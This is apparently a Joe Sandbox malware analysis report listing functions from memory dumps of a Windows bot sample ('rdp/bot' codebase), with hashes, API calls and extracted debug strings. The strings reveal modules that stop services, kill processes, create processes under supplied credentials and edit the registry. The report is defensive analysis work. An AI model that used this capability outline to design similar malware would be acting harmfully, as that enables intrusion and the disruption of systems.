                                                      • Instruction ID: b59eb668d1ad57aad88ffd6d82973d7e287144156624bcf1da7d195134105b2b
                                                      • Opcode Fuzzy Hash: 7fbede9ab6e892917caa8e9ff9fa6b1114ec0e30d3f62a1383d5cde42ff6b701
                                                      • Instruction Fuzzy Hash: 14F0F667B0A74681E693AF00F8503BA2254FF803F4F080235DD8D4A792EF2DD989D309
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Sleepmemcpy
                                                      • String ID:
                                                      • API String ID: 1125407320-0
                                                      • Opcode ID: c057402851dca6842acfeb53d5f4bd6522ef3f82a611d58142259f483ab9c493
                                                      • Instruction ID: 82b590a44f9ef74a6fb0d0d0c74db15e47b47536f52f351a61f920e8b561ed4e
                                                      • Opcode Fuzzy Hash: c057402851dca6842acfeb53d5f4bd6522ef3f82a611d58142259f483ab9c493
                                                      • Instruction Fuzzy Hash: E2316628B0E60F86F6669F24D86C37822516F53B70F200732E67D067E3EE2DE5445249
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: Sleepmemcpy
                                                      • String ID:
                                                      • API String ID: 1125407320-0
                                                      • Opcode ID: 90bf4d7274da88051de7ba236e3790971acd11ed8b2ecc5597919f091d7b9e59
                                                      • Instruction ID: 4d40d9d08b243e17191e58934ba35c9989e267a17373b8e15ac31286c7af0d24
                                                      • Opcode Fuzzy Hash: 90bf4d7274da88051de7ba236e3790971acd11ed8b2ecc5597919f091d7b9e59
                                                      • Instruction Fuzzy Hash: 5131272BF0A74AC6F622DF25A8A43782251AF42F70F100731E87E467E7CE2CA5549648
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: Sleepmemcpy
                                                      • String ID:
                                                      • API String ID: 1125407320-0
                                                      • Opcode ID: f4ae83479aff9af60f2a3b692e6c9872380cd6d8c1b389a7cbdcba70c0553c8d
                                                      • Instruction ID: 1f7853fc701a50417739f6a2337a121b94b253437be654623fdec6d9534273fa
                                                      • Opcode Fuzzy Hash: f4ae83479aff9af60f2a3b692e6c9872380cd6d8c1b389a7cbdcba70c0553c8d
                                                      • Instruction Fuzzy Hash: 89313C25F0F70286F7209764A8A42792251AF407F0F204332D4BD467E7CF2CE6A5BA8C
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: Sleepmemcpy
                                                      • String ID:
                                                      • API String ID: 1125407320-0
                                                      • Opcode ID: f2979eb66c59284bde3ecee25df94b5ff5ff0c8ae82d3456804992588ae00f14
                                                      • Instruction ID: 9cf44c40f6e0fa698186f87568ae93e88c6fd1214150adc72ef228c2e479a006
                                                      • Opcode Fuzzy Hash: f2979eb66c59284bde3ecee25df94b5ff5ff0c8ae82d3456804992588ae00f14
                                                      • Instruction Fuzzy Hash: BB310028F0E60B82FA225F25E8A937C2251AF52F74F500B71D47D467D3EF2CE5456648
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: Sleepmemcpy
                                                      • String ID:
                                                      • API String ID: 1125407320-0
                                                      • Opcode ID: 5e371bd4c57d357b9d91630660d94021c6a2b3b1d0672597ac3c6c04a2c664ba
                                                      • Instruction ID: d70710fa6f1b3637de557c29ee414f718e98a0209ab879a53f58adb738e77a10
                                                      • Opcode Fuzzy Hash: 5e371bd4c57d357b9d91630660d94021c6a2b3b1d0672597ac3c6c04a2c664ba
                                                      • Instruction Fuzzy Hash: 1C314D6EF0EE0241F6729B28A8A43382251AF517F4FA00731D43D067E3CE2CF945664E
                                                      APIs
                                                        • Part of subcall function 00007FF70CAD1FD0: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF70CAD162F), ref: 00007FF70CAD1FEE
                                                      • SleepEx.KERNEL32 ref: 00007FF70CAD1A51
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: HandleModuleSleep
                                                      • String ID:
                                                      • API String ID: 1071907932-0
                                                      • Opcode ID: c8c003f471b71a30b05e0dbd92c2347c511595d06f4733816d1c0ed97604998d
                                                      • Instruction ID: e249e462232cc499a07babca199bb3a587bb13e71742004f3ceb758950397c3c
                                                      • Opcode Fuzzy Hash: c8c003f471b71a30b05e0dbd92c2347c511595d06f4733816d1c0ed97604998d
                                                      • Instruction Fuzzy Hash: 860181A371C64782F7902654FC50BBDA295AF84364FD41071E74F872A9DF6CD9458360
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: ServiceStatus
                                                      • String ID:
                                                      • API String ID: 3969395364-0
                                                      • Opcode ID: e32b914f392c1bb68bce297dc10430292cf8290041b41d2df93b278c97710b2f
                                                      • Instruction ID: 7678cc1f16fe507eeef8c5233d35c3f7f367ef20108db94931d9ce328bce1699
                                                      • Opcode Fuzzy Hash: e32b914f392c1bb68bce297dc10430292cf8290041b41d2df93b278c97710b2f
                                                      • Instruction Fuzzy Hash: 03D06CF4D1A6028AE704BF49FC85825A6A0BF89785BD09035C10F43228EF2C66698B60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: rand_s
                                                      • String ID:
                                                      • API String ID: 863162693-0
                                                      • Opcode ID: d894bd9d1fefdfddca1d9388a77a24cda624f6bd6183f74499cae0a854ff162f
                                                      • Instruction ID: 58ec38d81c839771f1e7a6b203021bc5fc902465ae642d9423b41da36380c355
                                                      • Opcode Fuzzy Hash: d894bd9d1fefdfddca1d9388a77a24cda624f6bd6183f74499cae0a854ff162f
                                                      • Instruction Fuzzy Hash: 24C00276A185408AD620AB24EC4565AA770EB98308FD08121E65E82668DB3CD61ACF14
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalEnterSection
                                                      • String ID:
                                                      • API String ID: 1904992153-0
                                                      • Opcode ID: e4c6a4f8fdc4c5e7e294a81c5ab1ecc696208827fd2be91c8cd57836eb3360ae
                                                      • Instruction ID: 451bcb5299ef06af2f25bd520162bfd089cada86a78b9623dc56df69653208fd
                                                      • Opcode Fuzzy Hash: e4c6a4f8fdc4c5e7e294a81c5ab1ecc696208827fd2be91c8cd57836eb3360ae
                                                      • Instruction Fuzzy Hash: 50C08C9AF2B10A83EB0A6FA2B8A113402B09F9EB04F001434D84E823739F1C98D84A48
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AdaptersAllocInfo$Free
                                                      • String ID: (adapter_num != NULL)$(pref_adapter_type != NULL)$C:/Projects/rdp/bot/codebase/net.c$[D] (%s) -> Adapter detected(name=%s,desc=%s,type=%d)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetAdaptersInfo failed(res=%08lx)$[E] (%s) -> GetBestInterface failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$net_info
                                                      • API String ID: 2437369060-2367710237
                                                      • Opcode ID: 62033286d4d3422d0c1f4b9f13a41cc89f9b28d67cfe47d7682641c56829a688
                                                      • Instruction ID: 624d702c8a7cfd57e031ca33405bd011cc42594af65fede6628be5b2dac17cfe
                                                      • Opcode Fuzzy Hash: 62033286d4d3422d0c1f4b9f13a41cc89f9b28d67cfe47d7682641c56829a688
                                                      • Instruction Fuzzy Hash: 6E519068B0E64F96EF139F20E4783B822A0AF43F54F844435DA4D46397EEADE945C748
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: _errno$fclosefflushfopenfseekfwrite
                                                      • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                                                      • API String ID: 2897271634-4120527733
                                                      • Opcode ID: 0a059dc8ad38eedfc636077698553a61f56f5cb7248aab2b76f3f6cd307a87ec
                                                      • Instruction ID: d80aab309c31b2cfd413c2ddcd583e31c905f045e996a225604e455159c80459
                                                      • Opcode Fuzzy Hash: 0a059dc8ad38eedfc636077698553a61f56f5cb7248aab2b76f3f6cd307a87ec
                                                      • Instruction Fuzzy Hash: AED15169B0B60F91EA129F15E86937923A1BF57F84F554832EA0D073E3EE3DE5458308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Service$ErrorLast$DependentEnumHeapOpenServices$AllocCloseControlHandleProcessSleepfflushfwrite
                                                      • String ID: $ $(svc != NULL)$C:/Projects/rdp/bot/codebase/scm.c$No dependent service(s) to be stopped$P$P$[D] (%s) -> %s$[D] (%s) -> Service is already stopped(lpServiceName=%s)$[D] (%s) -> Service stop requested(lpServiceName=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$[E] (%s) -> EnumDependentServicesA(SERVICE_STATE_ALL) failed(lpServiceName=%s,gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> OpenServiceA(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$[E] (%s) -> OpenServiceA(SERVICE_ENUMERATE_DEPENDENTS) failed(lpServiceName=%s,gle=%lu)$[E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$[I] (%s) -> EnumDependentServicesA(SERVICE_STATE_ALL) done(lpServiceName=%s,dep_num=%lu)$[I] (%s) -> Service stopped(lpServiceName=%s,pid=%lu)$[W] (%s) -> scm_find failed(lpServiceName=%s)$mem_alloc$scm_stop$~$~
                                                      • API String ID: 1728296876-1811208690
                                                      • Opcode ID: 1b0ea2fe4bf6dd729f85b02111fe2a353584e5f075a0c7cd8e7877cc5ea1397e
                                                      • Instruction ID: f2db1aaf8e042ecf5f8182f9784331854831a611d4888fb20c666c46eadf892d
                                                      • Opcode Fuzzy Hash: 1b0ea2fe4bf6dd729f85b02111fe2a353584e5f075a0c7cd8e7877cc5ea1397e
                                                      • Instruction Fuzzy Hash: 6F126569B0E60FA5FB6B4F04A8B83791250AF57F48F104832C74E067D7DE6FA9858309
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen$strcat$CloseErrorHandleLastLogonUser
                                                      • String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
                                                      • API String ID: 1842180197-3127737957
                                                      • Opcode ID: 959a81bb8d9d16c09c9b08e236fed2cef2314a254f742983aa6ea1e17e52b8b3
                                                      • Instruction ID: 110bc4c212ff954899db4e37d3f3fdee7169894e4af0c3b7007ed1209617b5ea
                                                      • Opcode Fuzzy Hash: 959a81bb8d9d16c09c9b08e236fed2cef2314a254f742983aa6ea1e17e52b8b3
                                                      • Instruction Fuzzy Hash: A6126EADB0F64B81EA628F41E4683B96290BF42F84F410932DA4E477D7EF6DE545C708
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$Process$CloseHandleOpenTerminatestrcmp
                                                      • String ID: (name != NULL) || (pid != 0)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|
                                                      • API String ID: 2412365107-2593651398
                                                      • Opcode ID: f7b16dcb3a4a75ef44623e3ef9a96ca21ea1b3f9bc76733e0abd2494457a4974
                                                      • Instruction ID: f79b1f518a222bffd376134710ef94fc9fa70335d2bcef33e03e9d52a9b05393
                                                      • Opcode Fuzzy Hash: f7b16dcb3a4a75ef44623e3ef9a96ca21ea1b3f9bc76733e0abd2494457a4974
                                                      • Instruction Fuzzy Hash: 8BF1E718B0E70F86FA635E46A4BC3791280AF07F54F251832D70E463D3EE5FB985920A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenValuefflushfwrite
                                                      • String ID: $ $ $ $(key != NULL)$(root != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                      • API String ID: 716145365-86941537
                                                      • Opcode ID: c6790215c2e1f4f48c06e2e1481d1e32962ce08415568656474ac556ddacbdc2
                                                      • Instruction ID: 0d73accd7de6d87405bf705283ac27726ffc79648c84dacf54eefe138b7b58e1
                                                      • Opcode Fuzzy Hash: c6790215c2e1f4f48c06e2e1481d1e32962ce08415568656474ac556ddacbdc2
                                                      • Instruction Fuzzy Hash: 528167A8B0F70F51FE265F00A87CB792250AF22F44E550532DB1D46BDBFE1EA9848309
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteOpenValuefflushfwrite
                                                      • String ID: $ $ $ $(key != NULL)$(root != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                      • API String ID: 3240087161-1026589300
                                                      • Opcode ID: 1b1ab82d58521876086c39af6fdbe16a8f611ff3869a73cd1bfda2b6aee98c99
                                                      • Instruction ID: 4136392c97debe14d3a4b953d2169c404d56a8629d4018dc3e4a074885e98aea
                                                      • Opcode Fuzzy Hash: 1b1ab82d58521876086c39af6fdbe16a8f611ff3869a73cd1bfda2b6aee98c99
                                                      • Instruction Fuzzy Hash: 978177A8B0F70F85FE675F00A8687783254AF12F84E550932DB5E067D3FE1EA985C249
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
